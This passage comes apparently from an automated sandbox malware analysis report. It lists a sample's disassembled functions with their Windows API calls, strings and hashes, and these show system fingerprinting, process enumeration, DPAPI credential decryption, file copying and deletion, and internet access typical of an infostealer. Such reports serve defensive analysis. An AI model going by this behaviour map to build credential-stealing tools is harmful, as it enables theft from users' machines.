RegCloseKey.ADVAPI32(00000000), ref: 00414366

Memory Dump Source

Source File: 00000001.00000002.2087928703.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2087928703.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2087928703.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2087928703.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2087928703.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u42w.jbxd

Yara matches

Similarity

API ID: Heap$AllocCloseOpenProcessQueryValue
String ID:
API String ID: 3466090806-0
Opcode ID: 423f413abd2b9c08310d568d7ed0a8882adbdfbf2920ff6ae677e6fc83315809
Instruction ID: 8a55c6bb4586fa39bc5dd89715e436abefd5940c4b9bd8db073c1251d6bd8ac1
Opcode Fuzzy Hash: 423f413abd2b9c08310d568d7ed0a8882adbdfbf2920ff6ae677e6fc83315809
Instruction Fuzzy Hash: E3014FB5A40608BFDB20DBE4ED49FAEB77DEB88701F005154FA05E7290DB70AA01CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00409970 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116libraryCOMMON

Download Yara Rule

APIs

GetEnvironmentVariableA.KERNEL32(02F61A30,C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;,0000FFFF,?,?,?,?,?,?,?,?,?,?,?,0040EA16), ref: 0040998D
LoadLibraryA.KERNEL32(02F65990,?,?,?,?,?,?,?,?,?,?,?,0040EA16), ref: 00409A16

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

Part of subcall function 00416E20: lstrlen.KERNEL32(00000000,?,?,00412BE0,0041D59B,0041D59A,?,?,004137D6,00000000,?,02F60C98,?,0041D8AC,?,00000000), ref: 00416E2B
Part of subcall function 00416E20: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416E85

Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012

Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82

Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05

SetEnvironmentVariableA.KERNEL32(02F61A30,00000000,00000000,?,0041DA4C,?,0040EA16,C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;,0041D6EF), ref: 00409A02

Strings

C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;, xrefs: 00409982, 00409996, 004099AC

Memory Dump Source

Source File: 00000001.00000002.2087928703.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2087928703.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2087928703.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2087928703.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2087928703.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u42w.jbxd

Yara matches

Similarity

API ID: lstrcpy$EnvironmentVariablelstrcatlstrlen$LibraryLoad
String ID: C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;
API String ID: 2929475105-3463377506
Opcode ID: ed3454e25c9423e95906ddcdfb8aa2b8a27828ef3678f4780e14eb2c7f18e033
Instruction ID: 6647cd3c00128b620a4a232c7fbe97fce3d03bd073b05a107f0d1bf2b4fd60a8
Opcode Fuzzy Hash: ed3454e25c9423e95906ddcdfb8aa2b8a27828ef3678f4780e14eb2c7f18e033
Instruction Fuzzy Hash: 134196B5900A009BDB24DFA4FD85AAE37B6BB44305F01512EF405A72E2DFB89D46CF54

Uniqueness

Uniqueness Score: -1.00%

Function 004065D0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 66memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNEL32(?,?,@:h@,@:h@), ref: 0040668F

Strings

@:h@, xrefs: 00406670, 00406673
:h@, xrefs: 004065DD, 004065FD, 0040667F
:h@, xrefs: 0040660D, 00406629, 00406678, 00406688, 004065F4, 00406618, 00406623

Memory Dump Source

Source File: 00000001.00000002.2087928703.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2087928703.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2087928703.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2087928703.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2087928703.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u42w.jbxd

Yara matches

Similarity

API ID: ProtectVirtual
String ID: :h@$:h@$@:h@
API String ID: 544645111-3492212131
Opcode ID: 3a0ba57e5e1d9d33aaf5f8e161c54dbb9d0ff39d4d0ab0475c83cdde206519fc
Instruction ID: 05c83ec730d02739dc9afbe7597ff905435882b08ae1c12394b3aafa6fe5c026
Opcode Fuzzy Hash: 3a0ba57e5e1d9d33aaf5f8e161c54dbb9d0ff39d4d0ab0475c83cdde206519fc
Instruction Fuzzy Hash: 272131B4A00208EFDB04CF85C544BAEBBB1FF48304F1185AAD406AB381D3399A91DF85

Uniqueness

Uniqueness Score: -1.00%

Function 0040CEC0 Relevance: 6.2, APIs: 4, Instructions: 221filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012

Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05

Part of subcall function 00415260: GetSystemTime.KERNEL32(?,02F41CF8,0041D129,?,?,?,?,?,?,?,?,?,00404623,?,00000014), ref: 00415286

Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82

CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040CF41
lstrlen.KERNEL32(00000000), ref: 0040D0DF
lstrlen.KERNEL32(00000000), ref: 0040D0F3
DeleteFileA.KERNEL32(00000000), ref: 0040D16C

Memory Dump Source

Source File: 00000001.00000002.2087928703.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2087928703.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2087928703.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2087928703.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2087928703.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u42w.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
String ID:
API String ID: 211194620-0
Opcode ID: 5638474ecdd17819a2a886c24c0a46df4c87ffc9ef2feb8ef7b83979a2c482cc
Instruction ID: 64a31cdf4344fffa4b83296b1621afa9cae3fe45de11617b70f8002e61f1a089
Opcode Fuzzy Hash: 5638474ecdd17819a2a886c24c0a46df4c87ffc9ef2feb8ef7b83979a2c482cc
Instruction Fuzzy Hash: 758147769102049BCB14FBA1DC52EEE7739BF54308F51411EF516B6091EF38AA89CBB8

Uniqueness

Uniqueness Score: -1.00%

Function 0040FD10 Relevance: 6.1, APIs: 2, Strings: 1, Instructions: 857stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012

Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05

Part of subcall function 004141C0: GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 004141DF
Part of subcall function 004141C0: GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0041421C
Part of subcall function 004141C0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 004142A0
Part of subcall function 004141C0: HeapAlloc.KERNEL32(00000000), ref: 004142A7

Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82

Part of subcall function 00414300: GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 00414314
Part of subcall function 00414300: HeapAlloc.KERNEL32(00000000), ref: 0041431B
Part of subcall function 00414300: RegOpenKeyExA.KERNEL32(80000002,02F5C110,00000000,00020119,00000000), ref: 0041433B
Part of subcall function 00414300: RegQueryValueExA.KERNEL32(00000000,02F650F8,00000000,00000000,000000FF,000000FF), ref: 0041435C
Part of subcall function 00414300: RegCloseKey.ADVAPI32(00000000), ref: 00414366

Part of subcall function 00414380: GetCurrentProcess.KERNEL32(00000000,?,?,0040FF99,00000000,?,02F65930,00000000,?,0041D74C,00000000,?,00000000,00000000,?,02F61BC0), ref: 0041438F
Part of subcall function 00414380: IsWow64Process.KERNEL32(00000000,?,?,0040FF99,00000000,?,02F65930,00000000,?,0041D74C,00000000,?,00000000,00000000,?,02F61BC0), ref: 00414396

Part of subcall function 004143C0: GetProcessHeap.KERNEL32(00000000,00000104,00401177,02F61980,004136EB,0041D6E3), ref: 004143CD
Part of subcall function 004143C0: HeapAlloc.KERNEL32(00000000), ref: 004143D4
Part of subcall function 004143C0: GetUserNameA.ADVAPI32(?,00000104), ref: 004143EC

Part of subcall function 00414400: GetProcessHeap.KERNEL32(00000000,00000104,004136EB,0041D6E3), ref: 0041440D
Part of subcall function 00414400: HeapAlloc.KERNEL32(00000000), ref: 00414414
Part of subcall function 00414400: GetComputerNameA.KERNEL32(?,00000104), ref: 0041442C

Part of subcall function 00414450: GetProcessHeap.KERNEL32(00000000,00000104,?,0041D748,00000000,?,00000000,0041D2B1), ref: 0041445D
Part of subcall function 00414450: HeapAlloc.KERNEL32(00000000), ref: 00414464
Part of subcall function 00414450: GetLocalTime.KERNEL32(?), ref: 00414471
Part of subcall function 00414450: wsprintfA.USER32 ref: 004144A0

Part of subcall function 004144B0: GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?,02F650C8,00000000,?,0041D758,00000000,?,00000000,00000000,?,02F65B90,00000000), ref: 004144C0
Part of subcall function 004144B0: HeapAlloc.KERNEL32(00000000), ref: 004144C7
Part of subcall function 004144B0: GetTimeZoneInformation.KERNEL32(?), ref: 004144DA

Part of subcall function 00414530: GetUserDefaultLocaleName.KERNEL32(00000000,00000055,00000000,00000000,?,02F650C8,00000000,?,0041D758,00000000,?,00000000,00000000,?,02F65B90,00000000), ref: 00414542

Part of subcall function 00414570: GetKeyboardLayoutList.USER32(00000000,00000000,0041D146), ref: 0041459E
Part of subcall function 00414570: LocalAlloc.KERNEL32(00000040,?), ref: 004145B6
Part of subcall function 00414570: GetKeyboardLayoutList.USER32(?,00000000), ref: 004145CA
Part of subcall function 00414570: GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 0041461F
Part of subcall function 00414570: LocalFree.KERNEL32(00000000), ref: 004146DF

Part of subcall function 00414710: GetSystemPowerStatus.KERNEL32(00000000), ref: 0041471A

GetCurrentProcessId.KERNEL32(00000000,?,02F659D0,00000000,?,0041D76C,00000000,?,00000000,00000000,?,02F65500,00000000,?,0041D768,00000000), ref: 0041037E

Part of subcall function 00415B70: OpenProcess.KERNEL32(00000410,00000000,?), ref: 00415B84
Part of subcall function 00415B70: K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 00415BA5
Part of subcall function 00415B70: CloseHandle.KERNEL32(00000000), ref: 00415BAF

Part of subcall function 00414740: GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 00414754
Part of subcall function 00414740: HeapAlloc.KERNEL32(00000000), ref: 0041475B
Part of subcall function 00414740: RegOpenKeyExA.KERNEL32(80000002,02F5C500,00000000,00020119,00000000), ref: 0041477B
Part of subcall function 00414740: RegQueryValueExA.KERNEL32(00000000,02F65B30,00000000,00000000,000000FF,000000FF), ref: 0041479C
Part of subcall function 00414740: RegCloseKey.ADVAPI32(00000000), ref: 004147A6

Part of subcall function 00414800: GetLogicalProcessorInformationEx.KERNELBASE(0000FFFF,00000000,00000000), ref: 00414846
Part of subcall function 00414800: GetLastError.KERNEL32 ref: 00414855

Part of subcall function 004147C0: GetSystemInfo.KERNEL32(00000000), ref: 004147CD
Part of subcall function 004147C0: wsprintfA.USER32 ref: 004147E3

Part of subcall function 00414960: GetProcessHeap.KERNEL32(00000000,00000104,?,00000000,00000000,?,02F65518,00000000,?,0041D774,00000000,?,00000000,00000000,?,02F65560), ref: 0041496D
Part of subcall function 00414960: HeapAlloc.KERNEL32(00000000), ref: 00414974
Part of subcall function 00414960: GlobalMemoryStatusEx.KERNEL32(00000040), ref: 00414995
Part of subcall function 00414960: __aulldiv.LIBCMT ref: 004149AF
Part of subcall function 00414960: __aulldiv.LIBCMT ref: 004149BD
Part of subcall function 00414960: wsprintfA.USER32 ref: 004149E9

Part of subcall function 00414ED0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00414F1C
Part of subcall function 00414ED0: HeapAlloc.KERNEL32(00000000), ref: 00414F23
Part of subcall function 00414ED0: wsprintfA.USER32 ref: 00414F3D

Part of subcall function 00414AE0: RegOpenKeyExA.KERNEL32(00000000,02F63390,00000000,00020019,00000000,0041D289), ref: 00414B41

Part of subcall function 00414AE0: RegEnumKeyExA.KERNEL32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00414BC3
Part of subcall function 00414AE0: wsprintfA.USER32 ref: 00414BF6
Part of subcall function 00414AE0: RegOpenKeyExA.KERNEL32(00000000,?,00000000,00020019,00000000), ref: 00414C18
Part of subcall function 00414AE0: RegCloseKey.ADVAPI32(00000000), ref: 00414C29
Part of subcall function 00414AE0: RegCloseKey.ADVAPI32(00000000), ref: 00414C36

Part of subcall function 00414DE0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00414E07
Part of subcall function 00414DE0: Process32First.KERNEL32(00000000,00000128), ref: 00414E1B
Part of subcall function 00414DE0: Process32Next.KERNEL32(00000000,00000128), ref: 00414E30
Part of subcall function 00414DE0: FindCloseChangeNotification.KERNEL32(00000000), ref: 00414E9E

lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,00000000,?,00000000,00000000,00000000), ref: 0041095B

Part of subcall function 00404DC0: lstrlen.KERNEL32(00000000), ref: 00404E4A
Part of subcall function 00404DC0: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404EBB
Part of subcall function 00404DC0: StrCmpCA.SHLWAPI(?,02F61B90), ref: 00404ED9

Strings

E.A, xrefs: 00410981, 004109AC, 00410984

Memory Dump Source

Source File: 00000001.00000002.2087928703.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2087928703.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2087928703.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2087928703.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2087928703.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u42w.jbxd

Yara matches

Similarity

API ID: Heap$Process$Alloc$CloseOpen$wsprintf$Namelstrcpy$InformationLocallstrlen$CurrentInfoKeyboardLayoutListLocaleProcess32QueryStatusSystemTimeUserValue__aulldivlstrcat$ChangeComputerCreateDefaultDirectoryEnumErrorFileFindFirstFreeGlobalHandleInternetLastLogicalMemoryModuleNextNotificationPowerProcessorSnapshotToolhelp32VolumeWindowsWow64Zone
String ID: E.A
API String ID: 1035121393-2211245587
Opcode ID: 8c5e8baee51fe039dedb06812f184ffe25ed167e737ed22b87c4161df0bcc578
Instruction ID: c29c4d19e1a1d8256a8b8cfc17993bd3f91cdea4a247a897ffed86f061f16859
Opcode Fuzzy Hash: 8c5e8baee51fe039dedb06812f184ffe25ed167e737ed22b87c4161df0bcc578
Instruction Fuzzy Hash: 9372B076D10118AACB15FB91EC91EDEB73DAF14308F51439FB01662491EF346B89CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 00411350 Relevance: 6.1, APIs: 4, Instructions: 100stringCOMMON

Download Yara Rule

APIs

strtok_s.MSVCRT ref: 00411378

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

strtok_s.MSVCRT ref: 0041146F

Part of subcall function 00416E20: lstrlen.KERNEL32(00000000,?,?,00412BE0,0041D59B,0041D59A,?,?,004137D6,00000000,?,02F60C98,?,0041D8AC,?,00000000), ref: 00416E2B
Part of subcall function 00416E20: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416E85

Memory Dump Source

Source File: 00000001.00000002.2087928703.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2087928703.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2087928703.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2087928703.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2087928703.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u42w.jbxd

Yara matches

Similarity

API ID: lstrcpystrtok_s$lstrlen
String ID:
API String ID: 3184129880-0
Opcode ID: 065d792216242c25af7b61e5e9a9c488338e4d9e1012c18c005135395daaae49
Instruction ID: bc44fb65e395c18893d79e2daadfc8d7f4384440e0cba23ba4018ddaa6f79c9f
Opcode Fuzzy Hash: 065d792216242c25af7b61e5e9a9c488338e4d9e1012c18c005135395daaae49
Instruction Fuzzy Hash: 04417175D00208DBCB04EFE5D855AEEBB75BF48304F00811EE51177290EB38AA85CFA9

Uniqueness

Uniqueness Score: -1.00%

Function 004096C0 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 98COMMON

Download Yara Rule

APIs

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

Part of subcall function 004093A0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004093CC
Part of subcall function 004093A0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 004093F1
Part of subcall function 004093A0: LocalAlloc.KERNEL32(00000040,?), ref: 00409411
Part of subcall function 004093A0: ReadFile.KERNEL32(000000FF,?,00000000,'@,00000000), ref: 0040943A
Part of subcall function 004093A0: LocalFree.KERNEL32('@), ref: 00409470
Part of subcall function 004093A0: FindCloseChangeNotification.KERNEL32(000000FF), ref: 0040947A

Part of subcall function 00415530: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00415552

StrStrA.SHLWAPI(00000000,02F65758), ref: 0040971B

Part of subcall function 004094A0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00404BAE,00000000,00000000), ref: 004094CF
Part of subcall function 004094A0: LocalAlloc.KERNEL32(00000040,?,?,?,00404BAE,00000000,?), ref: 004094E1
Part of subcall function 004094A0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00404BAE,00000000,00000000), ref: 0040950A
Part of subcall function 004094A0: LocalFree.KERNEL32(?,?,?,?,00404BAE,00000000,?), ref: 0040951F

memcmp.MSVCRT ref: 00409774

Part of subcall function 00409540: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00409564
Part of subcall function 00409540: LocalAlloc.KERNEL32(00000040,00000000), ref: 00409583
Part of subcall function 00409540: LocalFree.KERNEL32(?), ref: 004095AF

Strings

DPAPI, xrefs: 0040976B
, xrefs: 004097A3

Memory Dump Source

Source File: 00000001.00000002.2087928703.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2087928703.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2087928703.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2087928703.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2087928703.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u42w.jbxd

Yara matches

Similarity

API ID: Local$Alloc$CryptFileFree$BinaryString$ChangeCloseCreateDataFindNotificationReadSizeUnprotectlstrcpymemcmp
String ID: $DPAPI
API String ID: 2647593125-1819349886
Opcode ID: d3a65021009ca582ddf87a55df3f4c114bb092f76f06acd42443a219e503715e
Instruction ID: 25d6f3248392bfa9bca68fd769027b68fff5740b7e0b7820d89104a1b18a6e16
Opcode Fuzzy Hash: d3a65021009ca582ddf87a55df3f4c114bb092f76f06acd42443a219e503715e
Instruction Fuzzy Hash: 493141B6D10108EBCF04DF94DC45AEFB7B9AF48704F14452DE905B3292E7389A44CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 00414DE0 Relevance: 6.1, APIs: 4, Instructions: 60processCOMMON

Download Yara Rule

APIs

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00414E07
Process32First.KERNEL32(00000000,00000128), ref: 00414E1B
Process32Next.KERNEL32(00000000,00000128), ref: 00414E30

Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012

Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05

FindCloseChangeNotification.KERNEL32(00000000), ref: 00414E9E

Memory Dump Source

Source File: 00000001.00000002.2087928703.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2087928703.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2087928703.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2087928703.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2087928703.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u42w.jbxd

Yara matches

Similarity

API ID: lstrcpy$Process32$ChangeCloseCreateFindFirstNextNotificationSnapshotToolhelp32lstrcatlstrlen
String ID:
API String ID: 3491751439-0
Opcode ID: 874ae79ec3e8192fa23909c5db076f4d3e0dbc31e37d4715c99de52b0292d680
Instruction ID: b51d58226d22fc07b4aaea4bdcaba1b12d12dab42e387443cd86e66b2ce9f1c4
Opcode Fuzzy Hash: 874ae79ec3e8192fa23909c5db076f4d3e0dbc31e37d4715c99de52b0292d680
Instruction Fuzzy Hash: ED211D759002189BCB24EB61DC95FDEB779AF54304F1041DAA50A66190DF38AFC5CF94

Uniqueness

Uniqueness Score: -1.00%

Function 004159E0 Relevance: 6.0, APIs: 4, Instructions: 39fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(00411879,80000000,00000003,00000000,00000003,00000080,00000000,?,00411879,?), ref: 004159FC
GetFileSizeEx.KERNEL32(000000FF,00411879), ref: 00415A19
CloseHandle.KERNEL32(000000FF), ref: 00415A27

Memory Dump Source

Source File: 00000001.00000002.2087928703.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2087928703.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2087928703.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2087928703.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2087928703.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u42w.jbxd

Yara matches

Similarity

API ID: File$CloseCreateHandleSize
String ID:
API String ID: 1378416451-0
Opcode ID: f3a5877fc348a9a64368c001e27037213673241a1fda354ede690d4ee948c5a4
Instruction ID: adbcd47bb22ca6d6b42933acd4cabc8e10c5a14c322029dfd4b487fe3fd33794
Opcode Fuzzy Hash: f3a5877fc348a9a64368c001e27037213673241a1fda354ede690d4ee948c5a4
Instruction Fuzzy Hash: C9F03139F44604FBDB20DBF0DC85BDE7779BF44710F118255B951A7280DA7496428B44

Uniqueness

Uniqueness Score: -1.00%

Function 004137B3 Relevance: 6.0, APIs: 4, Instructions: 30sleepCOMMON

Download Yara Rule

APIs

OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,02F60C98,?,0041D8AC,?,00000000,?,0041D8B0,?,00000000,0041D6E3), ref: 0041378A
CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 004137A8
CloseHandle.KERNEL32(00000000), ref: 004137B9
Sleep.KERNEL32(00001770), ref: 004137C4
CloseHandle.KERNEL32(?,00000000,?,02F60C98,?,0041D8AC,?,00000000,?,0041D8B0,?,00000000,0041D6E3), ref: 004137DA
ExitProcess.KERNEL32 ref: 004137E2

Memory Dump Source

Source File: 00000001.00000002.2087928703.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2087928703.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2087928703.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2087928703.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2087928703.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u42w.jbxd

Yara matches

Similarity

API ID: CloseEventHandle$CreateExitOpenProcessSleep
String ID:
API String ID: 941982115-0
Opcode ID: b72d18ed1bdfc85c434ab68d1be83dc3fedaf905ff30e20f0e2c3bf58e55dee1
Instruction ID: 00ad45554361a1bf9ffb836df5d455c5d00fe00f471bf70531fad30136aebd8c
Opcode Fuzzy Hash: b72d18ed1bdfc85c434ab68d1be83dc3fedaf905ff30e20f0e2c3bf58e55dee1
Instruction Fuzzy Hash: 5FF054B0944206AAE720AFA1DD05BFE7675BB08B46F10851AF612951C0DBB856818A5D

Uniqueness

Uniqueness Score: -1.00%

Function 00406730 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 157COMMON

Download Yara Rule

Strings

Pi@, xrefs: 00406884, 004067C2, 0040679E, 0040684E, 0040689F

Memory Dump Source

Source File: 00000001.00000002.2087928703.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2087928703.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2087928703.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2087928703.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2087928703.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u42w.jbxd

Yara matches

Similarity

API ID:
String ID: Pi@
API String ID: 0-1360946908
Opcode ID: 8cfa37973c56b3597612bf0eabde1d0c10c792fef38bbd1cab651f123bbbde38
